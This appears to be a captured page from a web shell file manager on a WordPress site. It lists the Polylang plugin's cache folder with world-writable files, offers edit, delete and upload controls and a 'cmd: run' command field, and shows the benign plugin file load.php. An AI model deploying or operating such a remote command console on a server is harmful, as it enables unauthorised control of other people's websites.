/
var
/
www
/
leolaart.com
/
www
/
wp-content
/
plugins
/
polylang
/
integrations
/
cache
/
/var/www/leolaart.com/www/wp-content/plugins/polylang/integrations/cache
mkdir
upload
Name
Size
Mode
Actions
cache-compat.php
3269
0666
edit
dl
rm
load.php
360
0666
edit
dl
rm
Edit:
/var/www/leolaart.com/www/wp-content/plugins/polylang/integrations/cache/load.php
(360B)
<?php /** * Loads the integration with cache plugins. * * @package Polylang */ if ( ! defined( 'ABSPATH' ) ) { exit; // Don't access directly. } add_action( 'plugins_loaded', function () { if ( pll_is_cache_active() ) { add_action( 'pll_init', array( PLL_Integrations::instance()->cache_compat = new PLL_Cache_Compat(), 'init' ) ); } }, 0 );
Save
cmd:
run